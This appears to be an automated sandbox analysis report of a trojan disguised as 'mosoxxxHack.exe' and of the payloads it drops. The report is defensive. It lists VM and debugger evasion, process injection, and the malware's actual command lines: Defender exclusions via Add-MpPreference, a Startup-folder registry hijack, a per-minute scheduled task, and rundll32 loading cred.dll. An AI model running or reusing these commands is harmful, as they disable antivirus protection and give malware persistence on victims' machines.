Source: a.exe, 00000011.00000002.406356590.0000000002B06000.00000004.00000001.sdmp, drbux.exe, 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: a.exe, 00000011.00000002.406356590.0000000002B06000.00000004.00000001.sdmp, drbux.exe, 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\mosoxxxHack.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\mosoxxxHack.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\mosoxxxHack.exe TID: 6288	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe TID: 6288	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe TID: 6556	Thread sleep time: -38891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe TID: 6572	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 4864	Thread sleep time: -42231s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 5156	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 3120	Thread sleep count: 79 > 30
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 3120	Thread sleep time: -2370000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 6860	Thread sleep count: 216 > 30
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 6860	Thread sleep time: -12960000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 6864	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 6856	Thread sleep count: 205 > 30
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 6856	Thread sleep time: -12300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 6868	Thread sleep time: -1080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 6860	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 6856	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe TID: 3120	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Window / User API: threadDelayed 1047			Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Window / User API: threadDelayed 6955			Jump to behavior

Source: C:\Users\user\Desktop\mosoxxxHack.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\mosoxxxHack.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Thread delayed: delay time: 38891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 42231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Thread delayed: delay time: 30000

Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
Source: mosoxxxHack.exe, 00000001.00000002.370415619.0000000006140000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: drbux.exe, 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: drbux.exe, 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: drbux.exe, 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: drbux.exe, 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: drbux.exe, 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: mosoxxxHack.exe, 00000001.00000002.370415619.0000000006140000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: mosoxxxHack.exe, 00000001.00000002.370415619.0000000006140000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mosoxxxHack.exe, 00000001.00000002.371394119.0000000006C6B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: drbux.exe, 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: drbux.exe, 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: mosoxxxHack.exe, 00000001.00000002.371394119.0000000006C6B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: drbux.exe, 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: mosoxxxHack.exe, 00000001.00000002.370415619.0000000006140000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\mosoxxxHack.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_00404130 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

25_2_00404130

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_0041B5A4 FindFirstFileExW,

25_2_0041B5A4

Source: C:\Users\user\Desktop\mosoxxxHack.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)

Show sources

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\mosoxxxHack.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00416432 mov eax, dword ptr fs:[00000030h]		25_2_00416432
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_004126A1 mov eax, dword ptr fs:[00000030h]		25_2_004126A1

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process queried: DebugObjectHandle	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_004108E2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

25_2_004108E2

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_00401D60 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,

25_2_00401D60

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Source: C:\Users\user\Desktop\mosoxxxHack.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00410A47 SetUnhandledExceptionFilter,	25_2_00410A47
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_004108E2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_004108E2
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00410C93 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_00410C93
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00414F83 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_00414F83

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\a.exe	Memory written: C:\Users\user\AppData\Local\Temp\a.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Memory written: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe base: 400000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_00402210 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,

25_2_00402210

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe'
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe'
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe'	Jump to behavior

.NET source code references suspicious native API functions

Show sources

Source: a.exe.1.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Reference to suspicious API methods: ('tqKq39om32', 'VirtualAlloc@kernel32.dll'), ('GDH7ZEhUti', 'OpenProcess@kernel32.dll'), ('JDyqYSPZHw', 'FindResource@kernel32.dll'), ('ore7lpM8vH', 'ReadProcessMemory@kernel32.dll'), ('jUf7sOoQqo', 'VirtualProtect@kernel32.dll'), ('IwIq93y97i', 'VirtualProtect@kernel32.dll'), ('K2K7S7N0eL', 'WriteProcessMemory@kernel32.dll'), ('H9I7Jyvk2C', 'LoadLibrary@kernel32'), ('wBH7RCRn2J', 'GetProcAddress@kernel32')
Source: 17.2.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Reference to suspicious API methods: ('tqKq39om32', 'VirtualAlloc@kernel32.dll'), ('GDH7ZEhUti', 'OpenProcess@kernel32.dll'), ('JDyqYSPZHw', 'FindResource@kernel32.dll'), ('ore7lpM8vH', 'ReadProcessMemory@kernel32.dll'), ('jUf7sOoQqo', 'VirtualProtect@kernel32.dll'), ('IwIq93y97i', 'VirtualProtect@kernel32.dll'), ('K2K7S7N0eL', 'WriteProcessMemory@kernel32.dll'), ('H9I7Jyvk2C', 'LoadLibrary@kernel32'), ('wBH7RCRn2J', 'GetProcAddress@kernel32')
Source: 17.0.a.exe.620000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Reference to suspicious API methods: ('tqKq39om32', 'VirtualAlloc@kernel32.dll'), ('GDH7ZEhUti', 'OpenProcess@kernel32.dll'), ('JDyqYSPZHw', 'FindResource@kernel32.dll'), ('ore7lpM8vH', 'ReadProcessMemory@kernel32.dll'), ('jUf7sOoQqo', 'VirtualProtect@kernel32.dll'), ('IwIq93y97i', 'VirtualProtect@kernel32.dll'), ('K2K7S7N0eL', 'WriteProcessMemory@kernel32.dll'), ('H9I7Jyvk2C', 'LoadLibrary@kernel32'), ('wBH7RCRn2J', 'GetProcAddress@kernel32')
Source: drbux.exe.25.dr, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Reference to suspicious API methods: ('tqKq39om32', 'VirtualAlloc@kernel32.dll'), ('GDH7ZEhUti', 'OpenProcess@kernel32.dll'), ('JDyqYSPZHw', 'FindResource@kernel32.dll'), ('ore7lpM8vH', 'ReadProcessMemory@kernel32.dll'), ('jUf7sOoQqo', 'VirtualProtect@kernel32.dll'), ('IwIq93y97i', 'VirtualProtect@kernel32.dll'), ('K2K7S7N0eL', 'WriteProcessMemory@kernel32.dll'), ('H9I7Jyvk2C', 'LoadLibrary@kernel32'), ('wBH7RCRn2J', 'GetProcAddress@kernel32')
Source: 25.0.a.exe.5f0000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Reference to suspicious API methods: ('tqKq39om32', 'VirtualAlloc@kernel32.dll'), ('GDH7ZEhUti', 'OpenProcess@kernel32.dll'), ('JDyqYSPZHw', 'FindResource@kernel32.dll'), ('ore7lpM8vH', 'ReadProcessMemory@kernel32.dll'), ('jUf7sOoQqo', 'VirtualProtect@kernel32.dll'), ('IwIq93y97i', 'VirtualProtect@kernel32.dll'), ('K2K7S7N0eL', 'WriteProcessMemory@kernel32.dll'), ('H9I7Jyvk2C', 'LoadLibrary@kernel32'), ('wBH7RCRn2J', 'GetProcAddress@kernel32')
Source: 25.2.a.exe.5f0000.1.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Reference to suspicious API methods: ('tqKq39om32', 'VirtualAlloc@kernel32.dll'), ('GDH7ZEhUti', 'OpenProcess@kernel32.dll'), ('JDyqYSPZHw', 'FindResource@kernel32.dll'), ('ore7lpM8vH', 'ReadProcessMemory@kernel32.dll'), ('jUf7sOoQqo', 'VirtualProtect@kernel32.dll'), ('IwIq93y97i', 'VirtualProtect@kernel32.dll'), ('K2K7S7N0eL', 'WriteProcessMemory@kernel32.dll'), ('H9I7Jyvk2C', 'LoadLibrary@kernel32'), ('wBH7RCRn2J', 'GetProcAddress@kernel32')
Source: 26.0.drbux.exe.d70000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Reference to suspicious API methods: ('tqKq39om32', 'VirtualAlloc@kernel32.dll'), ('GDH7ZEhUti', 'OpenProcess@kernel32.dll'), ('JDyqYSPZHw', 'FindResource@kernel32.dll'), ('ore7lpM8vH', 'ReadProcessMemory@kernel32.dll'), ('jUf7sOoQqo', 'VirtualProtect@kernel32.dll'), ('IwIq93y97i', 'VirtualProtect@kernel32.dll'), ('K2K7S7N0eL', 'WriteProcessMemory@kernel32.dll'), ('H9I7Jyvk2C', 'LoadLibrary@kernel32'), ('wBH7RCRn2J', 'GetProcAddress@kernel32')
Source: 26.2.drbux.exe.d70000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	Reference to suspicious API methods: ('tqKq39om32', 'VirtualAlloc@kernel32.dll'), ('GDH7ZEhUti', 'OpenProcess@kernel32.dll'), ('JDyqYSPZHw', 'FindResource@kernel32.dll'), ('ore7lpM8vH', 'ReadProcessMemory@kernel32.dll'), ('jUf7sOoQqo', 'VirtualProtect@kernel32.dll'), ('IwIq93y97i', 'VirtualProtect@kernel32.dll'), ('K2K7S7N0eL', 'WriteProcessMemory@kernel32.dll'), ('H9I7Jyvk2C', 'LoadLibrary@kernel32'), ('wBH7RCRn2J', 'GetProcAddress@kernel32')
Source: clp[1].exe0.32.dr, epK0KZUFaasIUKsyJ4/T7RBVOnrKBBxJtHYk6.cs	Reference to suspicious API methods: ('dkJ9hlnHLp', 'VirtualAlloc@kernel32.dll'), ('kcfW5yutTB', 'GetProcAddress@kernel32'), ('thaWS3dxbq', 'WriteProcessMemory@kernel32.dll'), ('KZAWBZwjcn', 'ReadProcessMemory@kernel32.dll'), ('IJV9TkVcMC', 'VirtualProtect@kernel32.dll'), ('HKaWLOxTs5', 'LoadLibrary@kernel32'), ('StW9cjkB6l', 'FindResource@kernel32.dll'), ('m1UWvL3jsB', 'VirtualProtect@kernel32.dll'), ('MhBWiNFTEn', 'OpenProcess@kernel32.dll')

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process created: C:\Users\user\AppData\Local\Temp\a.exe 'C:\Users\user\AppData\Local\Temp\a.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\a.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Users\user\AppData\Local\Temp\a.exe C:\Users\user\AppData\Local\Temp\a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process created: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\8a643770bf\
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN drbux.exe /TR 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe' /F
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ca82a716069a53\cred.dll, Main
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process created: C:\Users\user\AppData\Local\Temp\clp.exe 'C:\Users\user\AppData\Local\Temp\clp.exe'

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
